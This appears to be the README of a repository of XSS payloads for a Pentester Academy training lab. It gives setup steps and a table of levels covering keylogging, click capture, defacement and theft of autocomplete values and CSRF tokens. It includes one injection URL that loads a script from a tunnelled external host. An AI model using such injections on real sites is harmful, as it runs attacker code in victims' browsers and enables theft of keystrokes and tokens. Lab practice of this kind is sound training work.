These are JavaScript payloads that solve the challenges at http://pentesteracademylab.appspot.com/lab/webapp/jfp/{LEVEL_NAME}.
The goal is to use an XSS to modify the site, from simple redirection to keyloggers. The payloads for levels 1-6 are inspired by this blog:
- Part1: https://sp1icer.dev/writeups/javascript-for-pentesters-intro/
- Part2: https://sp1icer.dev/writeups/javascript-for-pentesters-pt-2/
The simplest way to debug is to open the Console in the browser and paste the code into it.
- Install localtunnel
```
npm install -g localtunnel
```
- Start a Python server in the current folder
```
./server.sh
```
- The payload can now be deployed by visiting the link in the browser
```
http://pentesteracademylab.appspot.com/lab/webapp/jfp/1?url=<script src=https://free-wombats-like.loca.lt/01.js></script>
```
Number | Description |
---|---|
1 | Modify elements |
2 | Loop |
3 | Modify form field target url |
4 | Add new field to form |
5 | Delete Elements |
6 | Capture Mouse clicks |
7 | Keylogger |
8 | XSS in |
9 | Load second js |
10 | Same as 9 |
11 | Defacement image |
12 | Steal autocomplete values |
13 | 12 but with XMLHttpRequest |
14 | XMLHttpRequest callback |
15 | XMLHttpRequest POST with callback |
16 | No solution. Where to get session? |
17 | Dynamically grab CSRF token |
18 | Evaluate HTML on other site |
19 | Get multiple CSRF tokens |
20 | Beautiful callback code |
21 | Parse XML document |